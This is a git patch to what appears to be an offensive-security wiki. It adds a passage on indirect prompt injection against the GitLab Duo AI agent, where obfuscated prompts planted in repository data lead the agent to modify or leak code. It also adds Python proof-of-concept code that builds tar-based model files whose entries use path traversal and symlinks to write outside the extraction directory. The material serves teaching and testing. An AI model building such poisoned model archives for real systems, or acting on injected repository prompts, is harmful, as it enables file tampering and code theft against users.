From 8a839ad1a0bfd3cff99a098aedbff48375ad00d2 Mon Sep 17 00:00:00 2001 From: carlospolop Date: Wed, 25 Jun 2025 23:49:47 +0200 Subject: [PATCH] f --- src/AI/AI-MCP-Servers.md | 4 ++++ src/AI/AI-Models-RCE.md | 32 ++++++++++++++++++++++++++++++++ 2 files changed, 36 insertions(+) diff --git a/src/AI/AI-MCP-Servers.md b/src/AI/AI-MCP-Servers.md index 1f3d1a695..9b43c5faa 100644 --- a/src/AI/AI-MCP-Servers.md +++ b/src/AI/AI-MCP-Servers.md @@ -102,5 +102,9 @@ For more information about Prompt Injection check: AI-Prompts.md {{#endref}} +Moreover, in [**this blog**](https://www.legitsecurity.com/blog/remote-prompt-injection-in-gitlab-duo) it's explained how it was possible to abuse the Gitlab AI agent to perform arbitrary actions (like modifying code or leaking code), but injecting maicious prompts in the data of the repository (even ofbuscating this prompts in a way that the LLM would understand but the user wouldn't). + +Note that the malicious indirect prompts would be located in a public repository the victim user would be using, however, as the agent still have access to the repos of the user, it'll be able to access them. + {{#include ../banners/hacktricks-training.md}} diff --git a/src/AI/AI-Models-RCE.md b/src/AI/AI-Models-RCE.md index 136b962cf..746479178 100644 --- a/src/AI/AI-Models-RCE.md +++ b/src/AI/AI-Models-RCE.md @@ -68,6 +68,38 @@ model.load_state_dict(torch.load("malicious_state.pth", weights_only=False)) ``` +## Models to Path Traversal +As commented in [**this blog post**](https://blog.huntr.com/pivoting-archive-slip-bugs-into-high-value-ai/ml-bounties), most models formats used by different AI frameworks are based on archives, usually `.zip`. Therefore, it might be possible to abuse these formats to perform path traversal attacks, allowing to read arbitrary files from the system where the model is loaded. + +For example, with the following code you can create a model that will create a file in the `/tmp` directory when loaded: + +```python +import tarfile + +def escape(member): + member.name = "../../tmp/hacked" # break out of the extract dir + return member + +with tarfile.open("traversal_demo.model", "w:gz") as tf: + tf.add("harmless.txt", filter=escape) +``` + +Or, with the following code you can create a model that will create a symlink to the `/tmp` directory when loaded: + +```python +import tarfile, pathlib + +TARGET = "/tmp" # where the payload will land +PAYLOAD = "abc/hacked" + +def link_it(member): + member.type, member.linkname = tarfile.SYMTYPE, TARGET + return member + +with tarfile.open("symlink_demo.model", "w:gz") as tf: + tf.add(pathlib.Path(PAYLOAD).parent, filter=link_it) + tf.add(PAYLOAD) # rides the symlink +``` {{#include ../banners/hacktricks-training.md}}